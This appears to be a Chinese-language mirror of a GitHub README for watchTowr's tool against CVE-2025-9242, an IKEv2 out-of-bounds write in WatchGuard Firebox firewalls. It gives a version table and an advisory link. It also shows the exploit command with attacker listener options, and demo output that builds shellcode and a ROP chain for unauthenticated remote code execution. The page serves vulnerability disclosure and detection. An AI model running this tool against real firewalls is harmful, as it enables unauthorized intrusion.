watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242

GitHub: watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242

针对 WatchGuard Firebox 防火墙 IKEv2 服务越界写入漏洞(CVE-2025-9242)的检测与利用验证工具,支持版本指纹识别和漏洞可利用性检测。

Stars: 12 | Forks: 5

# watchTowr-vs-WatchGuard-CVE-2025-9242 WatchGuard CVE-2025-9242 检测工件生成器 https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f 请参阅我们的[博客文章](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/)了解技术细节 # 检测演示 ``` python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-WatchGuard-CVE-2025-9242.py (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber) CVEs: [CVE-2025-9242] [#] Sending IKEv2 SA Init with default transform [#] WatchGuard Firmware Version: 12.11.3 [#] WatchGuard Build Number: 719894 [+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4 [+] Default IKEv2 service found [#] Verifying if IKEv2 service is vulnerable... [+] IKEv2 service is vulnerable to CVE-2025-9242 [#] Building shellcode payload... [#] Building ROP chain... [#] Sending exploit payload to 192.168.56.1:31337 ``` # 描述 此脚本旨在检测 WatchGuard OS 是否存在 CVE-2025-9242 漏洞。 # 受影响版本 以下 WatchGuard OS 版本受到影响 | 受影响版本 | 已修复版本 | | ------------------------------- | ------------------------ | | 2025.1 | 2025.1.1 | | 12.x | 12.11.4 | | 12.5.x (T15 & T35 型号) | 12.5.13 | | 12.3.1 (FIPS 认证版本) | 12.3.1_Update3 (B722811) | | 11.x | 生命周期结束 (EOL) | 欲了解更多信息,请访问 [WatchGuard Firebox iked 越界写入漏洞](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015) # 关注 [watchTowr](https://watchTowr.com) Labs 关注 [watchTowr](https://watchTowr.com) Labs 团队,获取最新的安全研究动态 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber
标签:CISA项目, CVE-2025-9242, Go语言工具, IKEv2, PoC, RCE, ROP链, Shellcode, WatchGuard, WatchGuard Fireware, 技术调研, 暴力破解, 检测工件生成器, 编程工具, 网络安全, 越界写入, 远程代码执行, 逆向工具, 防火墙, 隐私保护